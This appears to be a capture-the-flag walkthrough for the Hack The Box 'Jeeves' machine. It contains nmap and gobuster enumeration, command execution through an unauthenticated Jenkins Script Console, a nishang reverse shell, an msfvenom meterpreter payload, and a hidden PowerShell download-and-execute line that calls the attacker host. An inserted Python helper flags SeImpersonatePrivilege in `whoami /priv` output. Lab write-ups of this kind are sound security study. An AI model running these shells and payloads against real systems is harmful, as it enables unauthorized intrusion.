
Information

Port Scan

Use nmap to scan all TCP ports:

┌──(kali㉿kali)-[~/Documents/htb]
└─$ nmap -p- --min-rate 10000 10.10.10.63
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-19 07:41 EDT
Nmap scan report for 10.10.10.63
Host is up (0.27s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
50000/tcp open ibm-db2

Nmap done: 1 IP address (1 host up) scanned in 54.80 seconds

Run a detailed service and script scan against the open ports:

┌──(kali㉿kali)-[~/Documents/htb]
└─$ nmap -sC -sV -p 80,135,445,50000 10.10.10.63
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-19 07:56 EDT
Nmap scan report for 10.10.10.63
Host is up (0.32s latency).

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4h59m58s, deviation: 0s, median: 4h59m58s
| smb2-time:
| date: 2023-08-19T16:56:42
|_ start_date: 2023-08-19T16:40:30
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.06 seconds

The web server is Microsoft IIS httpd 10.0, so the operating system is probably Windows 10 or Windows Server 2016 or later.

WEB-80

Type something into the form and submit it; the result is as follows:

Viewing the page source shows that the response is just an image.

WEB - 50000

Directory enumeration

┌──(kali㉿kali)-[~/Documents/htb]
└─$ gobuster dir -u http://10.10.10.63:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.63:50000
[+] Method: GET
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/08/20 00:54:36 Starting gobuster in directory enumeration mode
===============================================================
/askjeeves (Status: 302) [Size: 0] [--> http://10.10.10.63:50000/askjeeves/]

WEB

Based on the directory enumeration result for port 50000, visit the /askjeeves directory.

Jenkins RCE

Visit http://10.10.10.63:50000/askjeeves/

The Jenkins instance here allows unauthenticated access.

Select "Manage Jenkins" -> "Script Console".

Enter the PoC to test:

print "whoami".execute().text

The command executes successfully, so the next step is to obtain a shell.

Getshell

Use nishang to obtain a shell: copy the nishang script into the current directory, edit it, and append the following line to the end of the file:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.12 -Port 1234

After editing the file, serve it with a python web server and listen on port 1234 with nc; the shell comes back to the listener.

Privilege

PS C:\Users\Administrator\.jenkins> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

Try to escalate privileges with JuicyPotato.
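A defensive triage helper, added here as an example and not part of the original write-up: it parses `whoami /priv` output (the table above, embedded as a constructed sample) and flags enabled privileges that a hardening review of a service account should treat as escalation risks. The risk list is an assumption limited to the two Potato-family privileges and can be extended.

```python
# Defensive triage helper (added example, not the write-up's code): parse
# `whoami /priv` output and flag enabled privileges that a hardening review
# should treat as local privilege escalation risks.
import re

# Assumed risk list: privileges that the Potato family of techniques relies on.
# SeImpersonatePrivilege is the one this write-up flags for JuicyPotato.
RISKY_PRIVILEGES = {
    "SeImpersonatePrivilege": "token impersonation (Potato family)",
    "SeAssignPrimaryTokenPrivilege": "primary token assignment (Potato family)",
}

# Constructed sample: the `whoami /priv` table from this page.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
"""

# One table row: privilege name, free-text description, then the State column.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_privileges(output: str) -> dict:
    """Return {privilege_name: state} for every privilege row in the table."""
    privs = {}
    for line in output.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def risky_enabled(output: str) -> dict:
    """Enabled privileges that are on the risk list, mapped to the reason."""
    return {name: RISKY_PRIVILEGES[name]
            for name, state in parse_privileges(output).items()
            if state == "Enabled" and name in RISKY_PRIVILEGES}


if __name__ == "__main__":
    for name, why in risky_enabled(SAMPLE_WHOAMI_PRIV).items():
        print(f"[!] {name} is enabled: {why}")
```

Run against the sample it reports only SeImpersonatePrivilege, which is exactly the condition the write-up goes on to use; a service account without a business need for that privilege is the thing to fix.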

To msf shell

# This step is optional

To convert the PS1 shell into an msf shell, first generate the payload with msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.12 LPORT=1235  -f psh-reflection >1.ps1

Start an HTTP server to serve the file for download:

python -m http.server 808

Start the listener in msfconsole:

msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LhOST 10.10.14.12
msf6 exploit(multi/handler) > set lport 1235
msf6 exploit(multi/handler) > run

Run the msfvenom-generated payload on the target:

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.12:808/1.ps1');1.ps1"

JuicyPotato

Escalate with JuicyPotato. Unlike the Bounty machine, the privileges held on Jeeves are different: only SeImpersonatePrivilege is available, so the -t parameter must be changed to -t t. See the JuicyPotato documentation for details.
